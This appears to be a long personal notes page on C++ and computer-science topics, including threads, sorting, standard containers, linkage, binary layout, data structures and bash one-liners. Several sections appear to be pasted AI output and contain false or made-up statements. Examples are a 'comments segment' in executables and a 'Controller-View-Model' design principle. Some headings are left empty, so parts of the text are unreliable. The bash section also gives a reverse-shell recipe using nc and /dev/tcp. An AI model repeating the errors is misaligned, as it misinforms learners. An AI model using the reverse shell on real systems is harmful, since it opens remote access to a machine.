This is getting into the weeds, but a mutex and the data it protects can happily be declared consecutively in the code; so consider what this might mean when both mutex and data end up in the same cache line.

Threads versus processes

tl;dr A thread is a branch of execution. A process can consist of multiple threads.


Threads and processes are both units of execution in a computer system, but they have some key differences. Both threads and processes have their own distinct advantages and uses, which make them important in different scenarios.

  1. Definition: A thread is a single sequence of execution within a process. It is also known as a lightweight process, as it shares the same address space and system resources with other threads in the same process. On the other hand, a process is an instance of a program that is being executed. It has its own memory space and system resources, and can consist of multiple threads.

  2. Resource Usage: Threads within a process share the same resources, such as memory, files, and I/O devices. This makes thread creation and context switching faster and more efficient. Processes, on the other hand, have their own separate resources and require more time and overhead for creation and context switching.

  3. Communication and Synchronization: Threads within a process can communicate with each other through shared memory, making it easier to share data and resources. However, this also means that proper synchronization mechanisms need to be in place to avoid conflicts. Processes, on the other hand, have their own separate memory space and communicate through inter-process communication mechanisms, which are more complex and slower than thread communication.

  4. Concurrency: Threads within a process can run concurrently on multiple CPU cores, making use of parallel processing. However, due to shared resources, improper synchronization can lead to race conditions and other concurrency issues. Processes can also run in parallel on different cores; because they do not share memory by default, they avoid data races, at the cost of more expensive communication.

  5. Fault Isolation: Since threads within a process share the same resources, a bug in one thread can affect the entire process, causing it to crash. Processes, on the other hand, have their own separate memory space, so a bug in one process will not affect other processes.

  6. Creation and Termination: Creating and terminating threads is faster and less resource-intensive compared to processes. This makes threads more suitable for lightweight tasks that require frequent creation and termination. Processes, on the other hand, require more time and resources for creation and termination, making them more suitable for heavier tasks that require longer execution times.

In summary, threads and processes have their own distinct purposes and uses, and the choice between them depends on the specific requirements of the task at hand. Threads are more efficient for tasks that require frequent creation and communication, while processes are more suitable for heavy and long-running tasks that require isolation and fault tolerance.

Thread best practices


C++ function parameters

For simple readonly types, pass by const value.

void func(const int p) { /* ... */ }

For large readonly types – i.e., larger than a pointer – pass by const reference. You should also consider whether the type is trivially copyable: i.e., whether a copy is a cheap shallow copy or an expensive deep copy.

void func(const big_type& p) { /* ... */ }

If the first thing you do is make a copy, pass by non-const value.

void func(int p) { /* ... */ }

If you want to modify the caller’s copy, pass by non-const reference.

void func(int& p) { /* ... */ }

class or struct?

The only difference between a class and a struct is the default access level: public for a struct, private for a class (the same applies to default inheritance).

But typically a struct is used for “plain old data” or memory-mapped data where you want the members to be laid out in a predictable way (virtual functions/inheritance add the complication of a vtable pointer.)

Either way, you can test your assertions at compile time with static_assert and the type traits header.

struct A {
  // public: <-- default for structs
  int x_;
};

If the data are constrained by an invariant – i.e., not all values are valid – use a class.

class B {
  private: // <-- default for classes
  int x_; // must be between 0-1000
};
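A sketch of actually enforcing that invariant (the throwing setter is just one policy; clamping or returning an error code are reasonable alternatives):

```cpp
#include <stdexcept>

class B {
  int x_{};  // invariant: always between 0 and 1000

public:
  explicit B(const int x) { set(x); }

  void set(const int x) {
    if (x < 0 || x > 1000)
      throw std::out_of_range{"x must be between 0 and 1000"};
    x_ = x;
  }

  int get() const { return x_; }
};
```

Because every path that writes x_ goes through the setter, no object of B can ever be observed in an invalid state.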

The magnitude of it all

In 2014 Randall Munroe estimated that Google stores 10 exabytes of data across all of its operations. However, as a C++ developer, you will only come across at most petabytes of storage; and if CPUs are topping out at gigahertz, then you won’t see anything much faster than a nanosecond.

                        1 000  kilo | milli .001
                    1 000 000  mega | micro .000 001
                1 000 000 000  giga | nano  .000 000 001
            1 000 000 000 000  tera | pico  .000 000 000 001
        1 000 000 000 000 000  peta | femto .000 000 000 000 001
    1 000 000 000 000 000 000   exa | atto  .000 000 000 000 000 001
1 000 000 000 000 000 000 000 zetta | zepto .000 000 000 000 000 000 001

See list of SI prefixes.

You may be tempted to use binary prefixes to be more precise – kibi, mebi, gibi, etc – but most people won’t know what you’re talking about. Also, manufacturers tend to use powers of 1000 rather than powers of 1024 – e.g., 1000³ rather than 2³⁰ for “giga” – because it makes their performance look better.

Important speeds you should be aware of

See why is everyone in such a rush?

1/1000000000 second == 1 nanosecond 

Approximate durations of typical operations (rounded to help remember.)

Action Duration (nanoseconds)
L1 cache read, variable increment <1
Branch misprediction (how do you measure this?) 5
L2 cache read, std::atomic 10
std::mutex/scoped_lock 20
Fetch from main memory 100
Semaphore acquire 200
Send 2KiB over 1Gbps network 20,000
Create a std::thread 20,000
Send packet from US to Europe and back 200,000,000


  1. Single Responsibility Principle (SRP): A class should have only one reason to change.

  2. Open-Closed Principle (OCP): Software entities should be open for extension, but closed for modification.

  3. Liskov Substitution Principle (LSP): Subtypes should be replaceable with their base types without altering the correctness of the program.

  4. Interface Segregation Principle (ISP): Clients should not be forced to depend on methods they do not use.

  5. Dependency Inversion Principle (DIP): High-level modules should not depend on low-level modules. Both should depend on abstractions.

  6. Principle of Least Knowledge (PLK): A class should only have knowledge about its immediate relationships, not about the internal workings of its collaborators.

  7. Composition over Inheritance: Favor composition and delegation over inheritance to achieve code reuse and flexibility.

  8. Don’t Repeat Yourself (DRY): Avoid duplicating code and instead use abstraction and encapsulation to reduce repetition.

  9. Keep It Simple, Stupid (KISS): Simplicity is key to maintainable and understandable code.

  10. Separation of Concerns (SoC): Divide code into distinct concerns to improve maintainability and modularity.


Less common but another set of principles to consider.

  1. Information Expert: Assign responsibilities to the class that has the most information needed to fulfill them.

  2. Creator: Assign responsibilities that create or initialize objects to the class that contains the necessary data.

  3. Controller: Assign responsibilities for handling user input and coordination of tasks to a separate controller class.

  4. Low Coupling: Reduce dependencies between classes by assigning responsibilities to the class with the least number of connections to others.

  5. High Cohesion: Assign responsibilities so that the functions and data within a class are closely related and focused on a single purpose.

  6. Polymorphism: Design classes and methods to be able to handle different types of input and produce different types of output.

  7. Protected Variations: Design classes and methods to be easily adaptable and protect against potential changes in requirements or external factors.

  8. Indirection: Use an intermediate class or interface to decouple two classes and allow for future changes without affecting the other.

  9. Pure Fabrication: Assign responsibilities to classes that do not represent real-world concepts but are necessary to fulfill system requirements.

  10. Controller-View-Model (CVM): Use a CVM design pattern to separate user interface, domain logic, and data manipulation responsibilities into distinct layers.


Jonathan Boccara’s CppCon 2018 talk 105 STL Algorithms in Less Than an Hour is well worth a watch for a quick overview.


Quicksort is the poster boy of sorting algorithms.

Quicksort is a sorting algorithm that follows the divide and conquer approach. It is one of the most popular sorting algorithms due to its efficiency and versatility. The time complexity of quicksort depends on various factors such as the choice of pivot, the input data, and the implementation of the algorithm.

In the best case scenario, when each chosen pivot splits the array into two roughly equal halves, the time complexity of quicksort is O(n log n). The balanced partitioning keeps the recursion depth to log n.

In the worst case scenario, when the pivot is chosen as the smallest or largest element and the input data is in reverse sorted order, the time complexity of quicksort is O(n^2). This is because the array is divided into two unequal parts at each step, resulting in an unbalanced partitioning.

In the average case, the time complexity of quicksort is also O(n*log n). This is because, on average, the array is divided into two equal parts at each step, resulting in a balanced partitioning.

The space complexity of quicksort is O(log n) in the best and average case scenarios, and O(n) in the worst case scenario. This is because the algorithm requires additional space for the recursive calls and the stack size increases in the worst case scenario due to unbalanced partitioning.

Overall, quicksort has a time complexity of O(n*log n) in the best and average case scenarios, and O(n^2) in the worst case scenario. Its space complexity is O(log n) in the best and average case scenarios, and O(n) in the worst case scenario.

Below is a Python implementation just for fun. But how is it implemented in C++?

# Function to perform quicksort
def quicksort(arr):
    # Base case: if array is empty or contains only one element, return the array
    if len(arr) < 2:
        return arr
    # Select the pivot element as the first element in the array
    pivot = arr[0]
    # Create empty arrays for elements smaller and larger than the pivot
    smaller = []
    larger = []
    # Loop through the array, comparing each element to the pivot
    for i in range(1, len(arr)):
        # If element is smaller than pivot, add it to the smaller array
        if arr[i] < pivot:
            smaller.append(arr[i])
        # Otherwise, add it to the larger array
        else:
            larger.append(arr[i])
    # Recursively call quicksort on the smaller and larger arrays
    return quicksort(smaller) + [pivot] + quicksort(larger)

# Example
my_array = [5, 2, 8, 1, 9, 3]
sorted_array = quicksort(my_array)
print(sorted_array)

# Output: [1, 2, 3, 5, 8, 9]
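To answer that question: in C++ the same divide-and-conquer idea can be sketched with std::partition (though in practice you would simply call std::sort, discussed next):

```cpp
#include <algorithm>
#include <iterator>
#include <vector>

template <typename It>
void quicksort(It first, It last) {
  if (std::distance(first, last) < 2) return;  // base case

  // Pick the middle element as the pivot (copied by value)
  const auto pivot = *std::next(first, std::distance(first, last) / 2);

  // Partition into [less than pivot | equal to pivot | greater than pivot]
  const It mid1 =
      std::partition(first, last, [&](const auto& e) { return e < pivot; });
  const It mid2 =
      std::partition(mid1, last, [&](const auto& e) { return !(pivot < e); });

  quicksort(first, mid1);  // recurse into the "less than" range
  quicksort(mid2, last);   // recurse into the "greater than" range
}
```

Excluding the elements equal to the pivot from both recursive calls avoids the infinite recursion that a naive two-way partition can hit.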

std::sort uses Introsort

Introsort is a sorting algorithm that combines the efficiency of quicksort with the guaranteed worst-case performance of heapsort. It starts by using quicksort and switches to heapsort if the recursion depth exceeds a certain limit; this avoids the worst-case scenario of quicksort, which occurs when the chosen pivots are repeatedly the smallest or largest elements. For small partitions it switches to insertion sort, whose low overhead wins on small inputs.

Introsort is a hybrid comparison-based sorting algorithm. It has an average time complexity of O(n log n) and, thanks to the heapsort fallback, a worst-case time complexity of O(n log n) too. Unlike merge sort, which also guarantees O(n log n), it sorts in place rather than requiring O(n) auxiliary memory.

Introsort also has a space complexity of O(log n), for the recursion stack used during the quicksort phase.

Overall, Introsort is a highly efficient and versatile sorting algorithm that is commonly used in many programming languages and libraries. Its ability to handle large datasets and its guaranteed worst-case performance make it a popular choice for sorting.

Introsort is in place but not stable: i.e., equivalent elements are not guaranteed to remain in the same order. However, the Standard Library offers stable_ versions of various sorting algorithms.

If additional memory is available, stable_sort remains O(n ∗ logn). However, if it fails to allocate, it will degrade to an O(n ∗ logn ∗ logn) algorithm.
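A sketch of why stability matters (the Trade type is illustrative): equal keys keep their original relative order.

```cpp
#include <algorithm>
#include <vector>

struct Trade {
  int price;
  int seq;  // arrival order
};

// Sort by price only; trades with equal prices stay in arrival order.
// Plain std::sort makes no such guarantee.
void by_price(std::vector<Trade>& trades) {
  std::stable_sort(
      trades.begin(), trades.end(),
      [](const Trade& a, const Trade& b) { return a.price < b.price; });
}
```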


Small array threshold

The threshold for switching to insertion sort varies for each compiler.


std::sort requires random access to the elements, so std::list has its own sort method, but it still (approximately) conforms to O(n log n). It can be implemented with merge sort as moving elements is cheap with a linked list.
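A sketch (the sorted helper is illustrative):

```cpp
#include <list>

// std::list provides a member sort because std::sort needs random access;
// splicing nodes is cheap, which makes merge sort a natural fit
std::list<int> sorted(std::list<int> l) {
  l.sort();
  return l;
}
```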

Other sorting algorithms

Considerations for choosing an algorithm: size of the input; type of the input, e.g., partially sorted or random.

Sorting algorithms are used to arrange a set of data elements in a specific order, such as numerical or alphabetical order. The complexity of a sorting algorithm refers to the amount of time and resources it takes to sort a given set of data. It is measured in terms of time complexity and space complexity. The time complexity refers to the number of operations the algorithm needs to perform, whereas the space complexity refers to the amount of memory required to run the algorithm. The following are the complexities of various sorting algorithms, from best to worst:

  1. Linear Time (O(n + k)): The best achievable for sorting, but only by non-comparison algorithms such as Counting sort and Radix sort, which exploit structure in the keys (e.g., a bounded integer range) rather than comparing elements; the k term reflects the size of that key range.

  2. Linearithmic Time (O(n log n)): The best possible for any comparison-based sort. These algorithms divide the input data into smaller subproblems and solve them individually. Merge sort and Heap sort guarantee O(n log n) in all cases; Quicksort achieves it on average.

  3. Quadratic Time (O(n^2)): The time required grows with the square of the input size, typically because of nested loops over the data. Bubble sort, Insertion sort, and Selection sort are quadratic in the average and worst cases, although Insertion sort shines on small or nearly-sorted inputs.

  4. Exponential Time (O(2^n)) and worse: No practical sorting algorithm is exponential; joke algorithms such as Bogosort are worse still (factorial time). Avoid anything in this class for all but trivial inputs.

Overall, the best comparison-based sorting algorithms have a time complexity of O(n log n); non-comparison sorts can reach O(n + k) when the keys permit. Quadratic algorithms should be reserved for small inputs. It is important to consider both the time and space complexity of a sorting algorithm when choosing the most appropriate one for a given task.

All of these are Θ(n log n) in all cases, apart from Timsort, which has a best case of Ω(n), and Quicksort, which has a terrible O(n²) worst case (if we happen to always pick the worst pivot). Quicksort is a good all-rounder with an O(n log n) average case, but that O(n²) worst case remains: picking the pivot carefully (e.g., median-of-three or at random) makes it rare, yet an input could still be constructed where the chosen pivot is always the worst case.


What are the most difficult concepts in computer science?

Virtual memory

OpenAI:

  1. Increased Available Memory: Virtual memory allows the computer to use hard disk space as additional memory, thereby increasing the amount of available memory. This is especially beneficial for systems with limited physical memory.

  2. Efficient Memory Management: With virtual memory, the operating system can allocate memory to different programs as needed, without worrying about the availability of physical memory. This allows for efficient memory management and prevents programs from crashing due to insufficient memory.

  3. Ability to Run Large Programs: Virtual memory makes it possible to run large programs that require more memory than what is available on the computer. The operating system can swap in and out different parts of the program, allowing it to run seamlessly.

  4. Faster Performance: By using virtual memory, the operating system can keep frequently used data and instructions in physical memory, while less frequently used data is stored in secondary storage. This results in faster access times for frequently used data, leading to overall improved system performance.

  5. Multi-Tasking: With virtual memory, multiple programs can be run simultaneously, with each program having its own virtual memory space. This allows for efficient multi-tasking and prevents one program from interfering with the memory of another.

  6. Protection of System Memory: Virtual memory helps protect the system by isolating each program’s memory space. This prevents one program from accessing or corrupting the memory of another program, ensuring system stability and security.

  7. Flexibility: Virtual memory allows for flexibility in system configurations as it is not limited by the amount of physical memory available. This makes it easier to upgrade or expand the system without having to worry about memory limitations.

  8. Reduced Fragmentation: With virtual memory, the operating system can allocate memory in smaller chunks than the physical memory size. This reduces memory fragmentation and allows for more efficient use of physical memory.

  9. Lower Cost: Virtual memory reduces the need for expensive physical memory upgrades, as it allows the system to use hard disk space as additional memory. This makes it a cost-effective solution for systems with limited physical memory.

  10. Easy to Implement: Virtual memory is a built-in feature of most modern operating systems and does not require any additional hardware or software. This makes it easy to implement and use, without any significant changes to the system.

Move semantics

This a large, complicated topic. See C++ Move Semantics - The Complete Guide by Nicolai M. Josuttis.

Hash functions

A hash function is a mathematical function that takes in an input and produces a fixed-size output called a hash or a digest. The output is typically a unique representation of the input, making it difficult to reverse the process and determine the original input. Hash functions are commonly used in cryptography to ensure data integrity and in data structures like hash tables for efficient storage and retrieval of data.

Properties of a hashing algorithm

String hashing

C++ standards

The big things for me are ranges and views: effortlessly express and manipulate ranges of data with zero iterators; they read naturally and are also lazily evaluated (and gcc 14 brings ranges::to<> to the party). Concepts I’ve used a little, but mostly to narrow the allowed types of an auto parameter: e.g., std::floating_point auto.

I’ve attempted to deep dive into templates a few times and it’s really quite an unpleasant language! However, whilst not a recent addition, constexpr is becoming increasingly supported; it gives you the readability of “normal” code with the potential performance benefits of compile-time evaluation. And it also finds UB! However, you quickly hit the issue where something isn’t constexpr, so you have to either implement it yourself or not bother.

Coroutines are quite high-profile but I haven’t got into them yet. Finally, the multidimensional array operator seemed like a game changer but I’ve only used it once!

You’ll have to reach into gcc 14 but std::print is very welcome; as are modules (which might be available in 13.2 with -fmodules-fs flag).

Notable mentions from C++17 are structured bindings and execution policy.


See the presentation by Marc Gregoire (CppCon 2022).

You’ve gotta track gcc head to avoid disappointment.

Ranges and views (part two)

A lot of effort has gone into ranges and views in C++23.





Also see cppreference.


C++14 is an extension and improvement of C++11.


The C++ Standard Library containers

  1. Efficient and Optimized Implementation: The C++ Standard Library containers are designed and implemented by experts to ensure optimal performance and efficiency. They are highly optimized for memory usage and execution speed, making them ideal for high-performance applications.

  2. Portability: The containers are part of the C++ Standard Library, which means they are available on all platforms and can be used with any C++ compiler. This ensures that your code can be easily ported to different systems without any compatibility issues.

  3. Wide Range of Containers: The C++ Standard Library provides a wide range of containers, each with its own unique properties and advantages. This allows developers to choose the most suitable container for their specific application needs.

  4. Easy to Use: The containers are designed with intuitive interfaces and consistent syntax, making them easy to use and learn. This reduces the learning curve for developers and enables them to quickly start using the containers in their code.

  5. Memory Management: The containers take care of memory management, which means developers don’t have to worry about allocating and deallocating memory manually. This helps to prevent common memory-related errors such as memory leaks and dangling pointers.

  6. Type Safety: The containers are type-safe, which means they only allow objects of a specific type to be stored in them. This helps to prevent type-related errors and ensures that the data stored in the containers is always of the correct type.

  7. Standardized and Well-Tested: The C++ Standard Library containers are well-tested and have been used by countless developers for many years. This means they are reliable and conform to the C++ standard, ensuring consistent behavior across different implementations.

  8. Interoperability: The containers can be easily used in conjunction with other C++ Standard Library components, such as algorithms and iterators. This allows for the creation of powerful and efficient data structures and algorithms.

  9. Flexibility: The containers can be easily customized to suit the specific needs of an application. This includes modifying the underlying data structure, defining custom comparison functions, and providing custom allocators.

  10. Community Support: The C++ Standard Library containers are widely used and have a large community of developers who are familiar with them. This means there is a wealth of resources and support available for developers who are using these containers in their code.

  1. std::vector

  2. std::list

  3. std::deque

  4. std::set

  5. std::multiset

  6. std::map

  7. std::multimap

  8. std::unordered_set (C++11)

  9. std::unordered_multiset (C++11)

  10. std::unordered_map (C++11)

  11. std::unordered_multimap (C++11)

  12. std::stack

  13. std::queue

  14. std::priority_queue

  15. std::array (C++11)

  16. std::forward_list (C++11)

  17. std::bitset

  18. std::valarray

  19. std::tuple (C++11)

  20. std::pair

Categories of containers

Sequence containers refer to a group of data structures that store elements in a linear or sequential order. This means that the elements are stored in a specific order and can be accessed sequentially, starting from the first element. Examples of sequence containers include arrays, vectors, lists, and deques.

On the other hand, associative containers refer to a group of data structures that store elements in an associative manner. This means that the elements are stored in a way that allows them to be accessed using a specific key or value. Examples of associative containers include maps, sets, and hash tables.

One of the main differences between sequence and associative containers is how elements are accessed. Sequence containers are accessed by position (an index or iterator), while associative containers are accessed by key. Indexing into a contiguous sequence container such as a vector is O(1); looking up a key in an ordered associative container is O(log n), or amortised O(1) for the hashed (unordered) variants.

Another difference is how elements are added and removed. In a sequence container you choose the position: elements can be inserted or erased anywhere without disturbing the relative order of the others. In an associative container the position is determined by the key, so you insert or erase by key and the container maintains its own ordering.

Additionally, contiguous sequence containers benefit from consecutive memory allocation, which makes iterating over large amounts of data cache-friendly and efficient. Associative containers are typically node- or bucket-based, with an extra level of indirection, so iteration involves more pointer chasing and is slower.

In summary, sequence containers are best used when the order of elements is important and efficient iteration is necessary, while associative containers are best used when quick access to elements based on keys or values is necessary.

Choosing a container

C++ linkage

Internal linkage refers to the visibility of a variable or function within a single translation unit (a source file and its included headers). It means that the variable or function can only be accessed within that translation unit and is not visible to other translation units in the program. This is achieved by using the static keyword before the variable or function declaration.

External linkage, on the other hand, refers to the visibility of a variable or function across multiple translation units in a program. It means that the variable or function can be accessed from any translation unit in the program. This is the default linkage for global variables and functions in C++. To declare a variable or function with external linkage, the extern keyword is used before the declaration.

In summary, internal linkage restricts the visibility of a variable or function to a single translation unit, while external linkage allows its visibility across multiple translation units. These concepts are important in managing the scope and accessibility of variables and functions in a C++ program.

Dependencies on static variables in different translation units are, in general, a code smell and should be a reason for refactoring.


If an object or function inside such a translation unit has internal linkage, then that specific symbol is only visible to the linker within that translation unit. If an object or function has external linkage, the linker can also see it when processing other translation units. The static keyword, when used in the global namespace, forces a symbol to have internal linkage. The extern keyword results in a symbol having external linkage.

Anonymous namespaces

Used to declare many things with internal linkage.

namespace {
  int a = 0;
  int b = 0;
  int c = 0;
}

Binary structure

See Linux Debuginfo Formats - DWARF, ELF, dwo, dwp - What are They All? - Greg Law - CppCon 2022.

Section Description
stack ↓ Local variables (grows downwards)
heap ↑ Dynamic memory (grows upwards)
.rodata Read-only data
.bss Uninitialised data
.data Initialised data
.text Code
  1. Header: This is the first segment of a binary executable and contains information about the file, such as the file type, architecture, and entry point.

  2. Text Segment: Also known as the code segment, this segment contains the executable instructions that make up the program. This is where the main logic and operations of the program are stored.

  3. Data Segment: This segment contains initialized global and static variables used by the program. These variables have a fixed memory location and their values can be modified during program execution.

  4. BSS Segment: This segment contains uninitialized global and static variables. Unlike the data segment, the variables in this segment are initialized to zero by the operating system when the program is loaded.

  5. Stack Segment: This segment contains the program’s stack, which is used for local variables, function calls, and return addresses. It grows and shrinks dynamically as the program executes.

  6. Heap Segment: This segment contains dynamically allocated memory, which is used for variables that are created and destroyed during program execution. The size of this segment can change dynamically as the program allocates and frees memory.

  7. Dynamic Linking Segment: This segment contains information about the dynamic libraries that the program uses. These libraries are loaded at runtime and their functions can be called by the program.

  8. Relocation Segment: This segment contains information about the memory addresses that need to be modified if the program is loaded at a different memory location than the one it was compiled for.

  9. Symbol Table Segment: This segment contains a list of all the symbols used in the program, such as function names and global variables. This information is used by the linker to resolve external dependencies.

  10. Debugging Information Segment: This segment contains information used for debugging the program, such as line numbers and variable names.

  11. Comments Segment: This segment may contain any comments or documentation added by the programmer during the development process. This segment does not affect the execution of the program.


Typically parallelism makes you think “threads within a process” but it’s worth considering different points in the processing that could be executed/calculated in parallel.

Kinds of parallelism

The iron law of performance

See wikipedia.

time/program = instructions/program * clockCycles/instruction * time/clockCycle

Amdahl’s law

Amdahl’s law is a fundamental principle in computer architecture that helps determine the potential speedup of a system by adding additional resources. It is named after computer architect Gene Amdahl, who first described it in 1967.

The law states that the overall performance improvement of a system is limited by the proportion of the system that cannot be parallelized. In other words, if a system has a portion of code that cannot be parallelized, then the overall speedup of the system will be limited by that portion, no matter how many additional resources are added.

Amdahl’s law can be mathematically represented as:

Speedup = 1 / ((1 - P) + P/N)

Where P is the proportion of the code that can be parallelized and N is the number of processors or resources added.

For example, if a system has a portion of code that takes up 20% of the total execution time and the remaining 80% can be parallelized, then the maximum speedup that can be achieved is 5x, regardless of how many processors are added.

This law highlights the importance of optimizing the non-parallelizable portion of a system in order to achieve the highest speedup possible. It also shows that adding more resources does not always result in a linear improvement in performance.

In summary, Amdahl’s law serves as a guideline for system designers to understand the trade-offs between adding more resources and optimizing the non-parallelizable portion of a system in order to achieve the best overall performance.

It’s very tempting to optimise the parts you are familiar with, but it’s not obvious how much your efforts will benefit the overall process. Spend your time on the bottlenecks.

Data structures

It’s important to know the common data structures and their characteristics.

  1. Array
  2. Linked List
  3. Stack
  4. Queue
  5. Binary Tree
  6. Binary Search Tree
  7. Heap
  8. Hash Table
  9. Graph
  10. Trie
  11. Priority Queue
  12. Set
  13. Dictionary/Map
  14. Tree
  15. Red-Black Tree
  16. B-Tree
  17. AVL Tree
  18. Fenwick Tree
  19. Segment Tree
  20. Disjoint Set Union (DSU)
  21. Bloom Filter
  22. Skip List
  23. Circular Buffer
  24. Double-ended Queue (Deque)
  25. Splay Tree
  26. Suffix Tree
  27. Bloomier Filter
  28. Radix Tree
  29. Fibonacci Heap
  30. K-D Tree


std::vector is the go-to container, so let’s give it some special attention. It has contiguous storage – therefore cache friendly – and uses the RAII paradigm: the data are created on the heap and the allocation and deallocation (new/delete) are handled for you. Interestingly, std::string exhibits many of the same characteristics, but it’s not quite containery enough to qualify.

How does my vector grow?

Estimate how many times the fax destructor is called below.

#include <iostream>
#include <vector>

auto x = 0uz; // C++23 size_t literal

int main() {
    struct fax {

        // Constructor and destructor
        fax() { std::cout << x << " ctor\n"; }
        ~fax() { std::cout << "\t" << x << " dtor\n"; }

        // Copy and move constructors
        fax(const fax&) { std::cout << x << " copy ctor\n"; }
        fax(fax&&) { std::cout << x << " move ctor\n"; }

        // Assignment operators
        fax& operator=(const fax&) {
            std::cout << x << " copy assignment\n";
            return *this;
        }
        fax& operator=(fax&&) {
            std::cout << x << " move assignment\n";
            return *this;
        }

        const size_t id = x++;
    };

    std::vector<fax> y;

    // Reduce copies by allocating up front
    // y.reserve(3);

    for (size_t i = 0; i < 3; ++i) {
        y.push_back(fax{});
        std::cout << "-- capacity " << y.capacity() << " --\n";
    }

    // fax f1 = fax{};
    // fax f2 = std::move(fax{});
}

See the program output (below), note how the capacity is growing exponentially (doubling each time).

1 ctor
2 move ctor
    2 dtor
-- capacity 1 --
3 ctor
4 move ctor
5 copy ctor
    5 dtor
    5 dtor
-- capacity 2 --
6 ctor
7 move ctor
8 copy ctor
9 copy ctor
    9 dtor
    9 dtor
    9 dtor
-- capacity 4 --
    9 dtor
    9 dtor
    9 dtor

For each push we call the default constructor to create a temporary object and then call the move constructor to populate the new element… so far so good. But crucially, when the vector is resized we must also copy all the existing elements into the new storage (the copy constructor is used here because the move constructor is not declared noexcept). Not an issue for this simple case, but if the class is expensive to copy there could be trouble ahead. Additionally, if there’s a bug in the copy constructor, we may be corrupting existing valid data simply by copying it around.

Binary search trees

Binary search trees have an average complexity of O(log n) unless the tree is unbalanced. Worst case, if the tree is degenerate (effectively a linked list), then it is O(n). std::set and std::map are implemented using a red-black tree, a type of balanced binary search tree. C++23 introduces std::flat_map which is implemented using contiguous storage to make it more cache-friendly.

Binary search trees are a popular data structure in computer science that are used to store and organize data in a hierarchical manner. They are based on the concept of a binary tree, which is a tree structure made up of nodes where each node has at most two child nodes (left and right).

In a binary search tree, the nodes are organized in a specific way that allows for efficient searching, insertion, and deletion operations. The left child of a node contains a value that is smaller than the value of the parent node, while the right child contains a value that is larger. This property is known as the "binary search property" and allows for faster searching by eliminating the need to search through all nodes in the tree.

Binary search trees are typically implemented using a linked data structure, where each node contains a value and references to its left and right child nodes. The tree is usually ordered from top to bottom, with the root node at the top and the leaf nodes at the bottom.

Some common operations on binary search trees include insert, delete, and search. These operations have a time complexity of O(log n), making binary search trees efficient for storing and retrieving data.

However, if the tree is not properly balanced, it can lead to a worst-case time complexity of O(n), making the operations much slower. To avoid this, various balancing techniques, such as AVL trees and red-black trees, are used to ensure the tree remains balanced and efficient.

Binary search trees are commonly used in applications that require fast searching, such as in databases and search engines. They are also used in implementing other data structures, such as binary heaps and priority queues.

Self-balancing binary search trees

A balanced tree is one of height O(log n), where n is the number of nodes in the tree. It is a sorted hierarchy of data where the left most node is the smallest, and the right most node is the largest.

Below each node of a binary search tree is a mini tree. The top of the tree is the middle element.

e|            /e          
d|           d            
c|          / \c          
b|         b              
a|        / \ /a          
9|-----  /   9            
8|      /     \8          
7|     7                  
6|      \     /6          
5|-----  \   5            
4|        \ / \4          
3|         3              
2|          \ /2          
1|           1            
0|            \0          

Hash tables

Hash tables have an amortized complexity of O(1) unless there are collisions. Worst case, if everything hashes to the same bin, then it is O(n). Additionally, if the proportion of occupied slots – known as the “load factor” or “fill ratio” – exceeds a threshold, then the hash table must be resized/rebuilt.

std::unordered_set and std::unordered_map are implemented using hash tables.


A heap is a useful data structure when it is necessary to repeatedly remove the object with the highest (or lowest) priority.

Support of random access iterators is required to keep a heap structure internally at all times. Note that a heap is only partially ordered: the root is guaranteed to be the smallest (min heap) or largest (max heap) element, but the remaining elements are not fully sorted.


Projected down, the top of the tree is the smallest element.

       1
   2       3
 4   5   6   7
8 9 a b c d e f

       1
      / \
     /   \
    /     \
   2       3
  / \     / \
 4   5   6   7
/ \ / \ / \ / \
8 9 a b c d e f

Comparison of heaps and binary search trees

A heap is a data structure that is based on a complete binary tree, where each parent node is either greater than or equal to (max heap) or less than or equal to (min heap) its child nodes. This means that the root node of a max heap is always the largest element in the heap, and the root node of a min heap is always the smallest element. Heaps are typically used to implement priority queues.

On the other hand, a binary search tree (BST) is a data structure in which each node has at most two child nodes (left and right), and the key value in the left child is less than the key value in the parent, while the key value in the right child is greater than the key value in the parent. This allows for efficient searching, insertion, and deletion of elements in the tree.

In summary, the main differences between a heap and a binary search tree are: - Structure: A heap is a complete binary tree, while a binary search tree is a binary tree. - Ordering: In a heap, the parent node is either greater than or equal to its child nodes, while in a binary search tree, the left child is always smaller than the parent and the right child is always greater. - Usage: Heaps are commonly used to implement priority queues, while binary search trees are used for efficient searching, insertion, and deletion of elements. - Balancing: Heaps do not need to be balanced, while binary search trees need to be balanced to maintain their efficiency.

Singly linked lists

Adding/removing at the beginning is O(1), but adding at the end means traversing the whole list, therefore O(n). Searching is also O(n).

std::forward_list is a singly linked list.

Doubly linked lists

Like a singly linked list but we can iterate both ways. It stores a pointer to both the beginning and end, therefore operations on the end are also O(1).

std::list is a doubly linked list.

C++ Standard Library container complexities

Container Average Case Complexity Worst Case Complexity
vector O(1) O(n)
list O(1) O(n)
deque O(1) O(n)
set O(log(n)) O(n)
multiset O(log(n)) O(n)
map O(log(n)) O(n)
multimap O(log(n)) O(n)
unordered_set O(1) O(n)
unordered_multiset O(1) O(n)
unordered_map O(1) O(n)
unordered_multimap O(1) O(n)
stack O(1) O(n)
queue O(1) O(n)
priority_queue O(log(n)) O(n)

Note: All complexities are in terms of the number of elements in the container.

However, the conventional CS wisdom for when to use a linked list over contiguous storage hasn’t applied for years: you have to measure. E.g., if a container fits in the cache, a vector might outperform everything else.

Argument dependent lookup (aka Koenig lookup)

Argument-dependent lookup, also known as ADL, or Koenig lookup, is the set of rules for looking up the unqualified function names in function-call expressions, including implicit function calls to overloaded operators. These function names are looked up in the namespaces of their arguments in addition to the scopes and namespaces considered by the usual unqualified name lookup.

Notice the cbegin and cend calls below don’t specify a namespace, see ADL.

#include <algorithm>
#include <iostream>
#include <iterator>
#include <vector>

int main() {

    const std::vector v{1, 2, 3, 4, 5};
    std::copy(cbegin(v), cend(v), std::ostream_iterator<int>(std::cout, "\n"));
}


As a Linux developer you need a strong command line game. bash is ubiquitous, and a powerful language in itself, without resorting to something like Python.


git is awesome on the command line and pretty much essential. Use it to manage your chores. See how to undo almost anything with git.

Send a string to an IP/port

(echo hello; sleep 1) | telnet 80
echo hello > /dev/tcp/
echo hello | nc localhost 80

Reverse shell

# server
nc -knvlp 3389

# client
bash -i >& /dev/tcp/server_ip/3389 0>&1

Target everything but one file

git add !(unit.md)

Random line from a file

shuf -n 1 readme.txt

From bash 5.




The three load average values are 1, 5 and 15 minutes.

15:29:28 up 20:23, 0 users, load average: 5.08, 1.49, 0.51


Stress your system in different ways.

stress --cpu 8
echo $(nproc)

Synonyms for localhost

localhost
127.0.0.1
127.1
::1
0 # wut

Move a file out of the way

mv {,_}.bash_history

Repeat a command

watch -d ip a

